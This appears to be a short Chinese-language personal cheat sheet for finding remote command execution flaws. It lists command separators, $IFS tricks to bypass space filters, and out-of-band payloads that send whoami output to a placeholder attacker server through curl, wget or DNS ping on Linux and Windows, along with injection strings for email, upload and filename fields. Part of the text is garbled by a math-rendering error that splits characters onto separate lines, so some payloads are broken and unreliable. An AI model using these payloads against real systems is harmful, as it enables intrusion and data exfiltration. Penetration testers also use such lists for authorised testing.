1.3 我的rce挖掘小手册分享: Window下||和& linux下||和& Linux下过滤空格可以使用:
I
F
S
,
{IFS},
IFS,IFS,$IFSKaTeX parse error: Can't use function '\u' in math mode at position 15: 9 JSON格式下的测试: \̲u̲000awget\u0020 …(whoami) curl http://服务器地址/
(
w
h
o
a
m
i
∣
b
a
s
e
64
)
′
w
′
g
′
e
′
t
(whoami|base64) 'w'g'e't
(whoami∣base64)′w′g′e′t{IFS}服务器地址 Windows下rce探测: ping %USERNAME%.服务器地址 for /F %x in (‘whoami’) do start http://服务器地址/%x(获取计算机名) for /F “delims=\ tokens=2” %i in (‘whoami’) do ping -n 1 %i.服务器地址(获取用户名) 测试邮箱:wget%209服务器地址/xxxx@qq.com 测试上传:sleep 10filename 测试filenname:||wget%20服务器地址 测试上传处下的名称: ;payload|payload&payload